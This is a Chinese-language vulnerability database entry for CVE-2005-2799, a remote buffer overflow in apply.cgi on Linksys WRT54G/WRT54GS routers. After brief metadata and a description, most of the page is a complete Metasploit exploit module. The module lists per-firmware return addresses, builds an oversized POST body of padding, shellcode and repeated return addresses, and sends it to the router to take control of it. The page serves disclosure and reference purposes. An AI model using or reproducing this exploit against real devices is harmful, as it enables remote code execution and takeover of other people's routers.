Linksys WRT54G apply.cgi缓冲区溢出漏洞

Linksys WRT54G apply.cgi缓冲区溢出漏洞

漏洞ID 1109066 漏洞类型 缓冲区溢出
发布时间 2005-09-13 更新时间 2005-10-20
图片[1]-Linksys WRT54G apply.cgi缓冲区溢出漏洞-安全小百科CVE编号 CVE-2005-2799
图片[2]-Linksys WRT54G apply.cgi缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200509-138
漏洞平台 CGI CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/10028
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-138
|漏洞详情
LinksysWRT54G是结合了无线接入点、交换机和路由器功能的无线路由设备。LinksysWRT54G3.01.03,3.03.6,可能还包括4.20.7以前的版本,在apply.cgi中存在缓冲区溢出漏洞,这可能允许远程攻击者通过一个长的HTTPPOST请求执行任意的代码。
|漏洞EXP
require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Linksys apply.cgi buffer overflow',
			'Description'    => %q{
				This module exploits a stack overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers.
				According to iDefense who discovered this vulnerability, all WRT54G versions prior to
				4.20.7 and all WRT54GS version prior to 1.05.2 may be be affected.
			},
			'Author'         => [ 'Raphael Rigo <devel-metasploit[at]syscall.eu>', 'Julien Tinnes <julien[at]cr0.org>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-2799'],
					[ 'OSVDB', '19389' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305'],
				],
			'Payload'        =>
				{
					#'BadChars' => "x00",
					'Space'    => 10000,
					'DisableNops' => true,
				},
			'Arch'		 => ARCH_MIPSLE,
			'Platform'       => 'linux',
			'Targets'        => 
				[
					# the middle of the intersection is our generic address
					#((addrs.map { |n, h| [h["Bufaddr"],n] }.max[0] + addrs.map { |n, h| [h["Bufaddr"],n] }.min[0]+9500)/2).to_s(16)
					[ 'Generic', { 'Bufaddr' => 0x10002b50}],
					[ 'Version 1.42.2', { 'Bufaddr' => 0x100016a8 }],
					[ 'Version 2.02.6beta1', { 'Bufaddr' => 0x10001760 }],
					[ 'Version 2.02.7_ETSI', { 'Bufaddr' => 0x10001634 }],
					[ 'Version 3.03.6', { 'Bufaddr' => 0x10001830 }],
					[ 'Version 4.00.7', { 'Bufaddr' => 0x10001AD8 }],
					[ 'Version 4.20.06', { 'Bufaddr' => 0x10001B50 }],
				],
			'DisclosureDate' => 'Sep 13 2005',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(80),
					Opt::RHOST('192.168.1.1')
				], self.class)
	end


# Approx size of the remaining space in the data segment after our buffer
DataSegSize=0x4000
	def exploit
		c = connect

		print_status("Return address at 0x#{target['Bufaddr'].to_s(16)}")
		print_status("Shellcode length: #{payload.encoded.length}")

		addr = [target['Bufaddr']].pack('V')

#		original = "Cache-Control: no-cachernPragma: no-cachernExpires: 0x00x00x00"
#		original += "x10xADx43x00x18xADx43x00x70x3ex00x10x00x00x00x00"
#		            Pointers in 2.02.6beta1


#		 | BIG BUFFER  | Various structs and function pointers | ... | .ctors | .dtors | ... | .got |
#		 | <- 10000 -> | **************************** Pad with return address ***********************
#		 I know this is horrible :( - On the other side this is very generic :)
		post_data = "x00"*(10000-payload.encoded.length)+payload.encoded+addr*(DataSegSize/4)
		
		#post_data = "x00"*(10000-payload.encoded.length)+payload.encoded+original+addr*2#+"x24xadx43"

#	        res = send_request_cgi({ 'uri' => "/apply.cgi",	
#				  'method' => 'POST',
#				  'data' => post_data });
#		print_status("Malicious request sent, do_ej should be overwritten")
		
		req = c.request_cgi({ 'uri' => "/apply.cgi",	
				  'method' => 'POST',
				  'data' => post_data })
		c.send_request(req)
		print_status("Mayhem sent")


#		req=c.request_cgi('uri' => '/');
#		c.send_request(req);
#		print_status("do_ej triggered")

		handler
		disconnect
	end

end
|参考资料

来源:IDEFENSE
名称:20050913LinksysWRT54GRouterRemoteAdministrationapply.cgiBufferOverflowVulnerability
链接:http://www.idefense.com/application/poi/display?id=305&type;=vulnerabilities

相关推荐: Network Query Tool Remote Command Execution Vulnerability

Network Query Tool Remote Command Execution Vulnerability 漏洞ID 1102843 漏洞类型 Input Validation Error 发布时间 2001-10-22 更新时间 2001-10-22…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享